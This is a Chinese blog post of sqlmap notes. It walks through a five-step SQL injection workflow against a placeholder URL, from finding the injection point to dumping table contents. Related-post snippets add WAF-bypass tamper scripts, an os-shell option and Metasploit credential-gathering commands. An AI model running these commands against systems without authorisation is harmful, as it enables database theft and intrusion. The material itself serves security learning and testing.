Sqlmap笔记

已于 2024-03-03 15:33:22 修改
阅读量363 收藏 8
点赞数 8
分类专栏: 网络安全 文章标签: web安全 网络安全
于 2023-12-13 22:14:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59294755/article/details/134983099
版权

Sqlmap是一个自动检测和利用SQL注入漏洞的免费开源工具

1、支持对多种数据的库进行注入测试,能够自动识别数据库类型并注入

2、支持多种注入技术,并且能够自动探测使用合适的注入技术,如:布尔盲注、时间盲注、联合查询注入、报错注入、堆查询注入

3、能够爆破数据库信息,如用户名、密码

4、能够自动识别哈希密码,并且使用密码字典进行破解

Sqlmap注入流程:

       一、判断是否存在注入点

sqlmap -u url(目标地址)

       二、查询数据库信息

sqlmap -u http://xxx.com/?id=1 --dbs

--dbs:查看所有数据库名

--current-db:查看当前使用的数据库 

       三、根据数据库爆破数据表

sqlmap -u http://xxx.com/?id=1 -D 库名 --tables

-D:指定数据库名

--tables:查看指定库下面的所有表名 

        四、根据数据库名和数据库表名爆破字段名

sqlmap -u http://xxx.com/?id=1 -D 库名 -T 表名 --columns

-T:指定表名

--columns:查看指定库的表中的所有字段名 

        五、爆破字段里面的数据

sqlmap -u http://xxx.com/?id=1 -D 库名 -T 表名 -C 字段名 --dump

-C:指定字段名

--dump:根据指定库、表、字段爆破里面的数据 

WDEP
关注
  • 8
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqlmap笔记.md
08-18
sqlmap笔记
SQLMAP渗透笔记
04-25
SQLMAP渗透笔记
SQLMAP使用笔记全集
05-20
收录了SQLmap使用笔记,使用方法,以及讲解实例,是学习使用sqlmap应用工具的好材料
sqlmap使用笔记1
08-03
1.读取数据库版本,当前用户,当前数据库 2.判断当前数据库用户权限 3.读取所有数据库用户或指定数据库用户的密码
SQLMAP使用笔记.pdf
01-25
SQLMAP使用笔记
sqlmap注入教程 常用指令
qq_58000413的博客
06-29 1785
sqlmap一些指令
SQLMap使用|命令大全(干货)
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
sqlmap命令大全(附详细扫描流程)
m0_50818626的博客
05-24 6707
3.扫描指定数据库中的所有表名,-D可以指定要扫描的数据库,这里我扫的是security库。红框内就是我们所扫描出的字段名,一共有三个,分别为id,password,username。如上图所示,我们就把我们需要的username和password找出来啦!4.扫描users中的字段名是什么,-T可以指定扫描的表。上图红框内就是security库中的所有表啦。可以看到有漏洞,布尔盲注和时间盲注。可以看到所有的数据库都被扫描出来了。5.用dump扫描出字段中的所有数据。2.扫描所有数据库 -dbs
SQLMAP使用总结
qq_44657899的博客
05-02 1079
正常注入 python sqlmap.py -r .\test.txt --level 3 --batch --dbs 绕过waf sqlmap.py -r .\test.txt --dbs --batch --tamper space2morehash.py,space2hash.py,base64encode.py,charencode.py 获取可获得信息 sqlmap -r .\test.txt --current-db --current-user --hostname --is-dba
Web安全工具—Sqlmap常用命令和参数(持续更新)
热门推荐
weixin_44431280的博客
04-07 1万+
Web安全工具—SQLMAP常用命令和参数 简介:此篇文章主要记录学习注入神器sqlmap的过程,文章会对常见参数进行详解(附图),适合入门学习。 一:SQLMAP介绍: 简介:sqlmap是一个由python语言编写的开源自动化渗透测试工具,主要被用来检测sql注入漏洞,是一款功能强大的sql漏洞检测利用工具。 支持检测的数据库:access,mysql,oracle,postgresql,sqlserver(mssql),db2等 支持的注入类型:布尔盲注,时间盲注,显错注入,堆叠注入,联合查询注入等,
sqlmap使用方法
08-26
sqlmap -p 指定测试参数 -b 获取banner --dbs 列举数据库 --is-dba 是否是管理员权限 --current-db 当前数据库 --current-user 当前用户 --tables 列举数据库的表名 --count 检索所有条目数 --columns 获取表的列名 --dump 获取表中的数据,包含列 --dump-all 转存DBMS数据库所有表项目 --level 测试等级(1-5),默认为1 -v 显示详细信息 读取数据库--->读取表---->读取表的列---->获取内容
msf 笔记 & sqlmap 笔记
dqd66的博客
10-18 491
msf exploit(handler) > set exitonsession false 运行这条命令后,4444端口会一直处于侦听状态meterpreter > run post/windows/gather/credentials/credential_collector 目标主机上的身份认证信息meterpreter > run post/windows/gather/enum_applications 目标主机安装了哪些软件。
SQLMap笔记
weixin_40650190的博客
05-08 181
1.SQLMap支持的数据库: MySQL ,Oracle , PostgreSQL , SQL Server, Access , IBM DB2 , SQLite , Firebid ,Sybase , SAP MaxDB 2.基本使用: python sqlmap.py -u "URL" --batch ...
SQLmap笔记
IT界迷者Blog--
10-17 401
SQLmap笔记 sqlmap -u http://www.baidu.com/news_show.aspx?id=97 检测注入点是否可用 sqlmap -u http://www.baidu.com/news_show.aspx?id=97 --tables 列出当前web数据库所有表名 nmap --script=vuln 漏洞扫描脚本 sqlmap -u 注...
sqlmap 笔记
YouthBelief的博客
10-09 403
sqlmap一、指定目标二、请求三、注入四、操作系统控制sqlmap请求过快被封 解决办法sqlmap与burp联动使用脚本 一、指定目标 1.指定url -u "rul" 2.指定burp代理日志 -l proxy.log 3.从文件中解析目标 -m url.txt 4.从文件载入http请求 bp抓包 保存 -r test.txt 二、请求 1.put请求 -method=PUT 2.post数据 -data="id=1&username=admin" 3.指定分隔符 默认 &为 分
SQLmap学习笔记
weixin_51031096的博客
03-12 257
sqlmap学习笔记,有基础sqlmap探测流程
Sqlmap命令使用
一醉一休的博客
02-27 4081
Sqlmap基本命令使用,总结常用23条命令
sqlmap工具说明
tlucky的博客
03-06 1302
版本:v1.4.10支持环境:windows,linux等支持语言:python设计目的:可自动执行SQL注入缺陷的检测和开发过程,并接管数据库服务器实现:有强大的检测引擎,针对不同类型的数据库提供多样的渗透测试功能选项,实现数据库识别、数 据获取、访问DBMS\操作系统甚至通过带外数据连接的方式执行操作系统的命令。,以及从数据 库指纹识别、从数据库获取数据、访问底层文件的广泛范围的交换机通过带外连接在操作系统上 执行命令。
SQLMap使用教程:萌新自用总结
tj2718647721的博客
07-10 110
可以通过 “--risk” “--level”调整 扫描级别,服务器存在WAF或者其他拦截器时,可以使用"-tamper"来变形Payload。使用 python sqlmap.py -r 1.txt --os -shell --level=3可以获取shell。--batch --smart -a自动注入 ,--batch --smart 自动选择 y/s/q。使用--dbs获得数据库列表,使用“-d 数据库名 --table”指定获得所有表名。使用“--dump”可以索取全部数据。
sqlmap kali
最新发布
04-11
SQLMap是一款开源的自动化SQL注入工具,用于检测和利用Web应用程序中的SQL注入漏洞。它是基于Python编写的,并且在Kali Linux等渗透测试和安全评估工具中广泛使用。 SQL注入是一种常见的Web应用程序漏洞,攻击者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

WDEP

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值